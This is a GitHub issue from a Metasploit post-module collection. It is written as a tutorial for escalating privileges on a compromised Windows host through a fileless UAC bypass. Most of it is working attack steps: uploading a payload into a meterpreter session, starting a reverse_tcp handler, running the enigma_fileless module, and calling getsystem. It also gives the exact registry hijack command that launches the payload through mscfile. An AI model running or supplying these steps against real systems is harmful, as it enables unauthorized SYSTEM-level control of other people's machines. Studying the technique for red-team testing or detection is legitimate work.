search

r00t-3xp10it / msf-auxiliarys

My collection of metasploit auxiliary post-modules
189 stars 82 forks source link

[ enigma_fileless_uac_bypass ] privilege_escalation #3

Open r00t-3xp10it opened 7 years ago

r00t-3xp10it commented 7 years ago

Achieve privilege escalation with enigma_fileless post-modules

enigma_fileless_uac_bypass -- metasploit post-exploitation module: enigma_fileless_IsolatedCommand -- metasploit post-exploitation module:

Scenario:

This next tutorial explains how EXEC_COMMAND can be used to achieve privilege escalation ..

We have achieved to exploit a windows target, but when trying to privilege escalation
using metasploit core modules (getprivs and getsystem) the execution fails and none
of the 3 methods available in getsystem module works...

getsystem fail




Prepair Lab for privilege escalation:

1 - get a meterpreter session open to target system ..
     "its a post-exploitation module it requires a session allready open"

2 - upload your payload.exe to target system
      meterpreter > upload /root/payload.exe %temp%\\payload.exe

3 - background current session (ID 1)
     meterpreter > background

4 - start a new handler in background (of the payload uploaded)
     msf exploit(handler) > handler -P 666 -H 192.168.1.69 -p windows/meterpreter/reverse_tcp

5 - load enigma_fileless module
     msf exploit(handler) > use post/windows/escalate/enigma_fileless ...

Post-Module execution:

set SESSION 1
set EXEC_COMMAND start %temp%\\payload.exe
exploit

privilege_escalation Hint: If we desire to use target powershell interpreter to execute payload:

set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start %temp%\\payload.exe
exploit


Privilege_escalation using metasploit (getsystem):

The 2 session will open as a high integrity process (elevated process hijack)
allowing us to priv escall using metasploit post-modules like getprivs and getsystem

1 - Interact with 2 session open
      msf exploit(handler) > sessions -i 2

2 - elevate privileges now
      meterpreter > getprivs
      meterpreter > getsystem




Full command beeing executed in target machine (regedit):

cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\cmd.exe /c start %temp%\\payload.exe" /f




Video Tutorials:

Privilege escalation: https://www.youtube.com/watch?v=Ph7MajHbEVQ Simple command execution: https://www.youtube.com/watch?v=upmNEJRf5Z8



Credits:

UAC bypass method credits: @enigma0x3 @Mattifestation @SubTee https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking

Special Thanks: @Chaitanya (SSA Team Menber)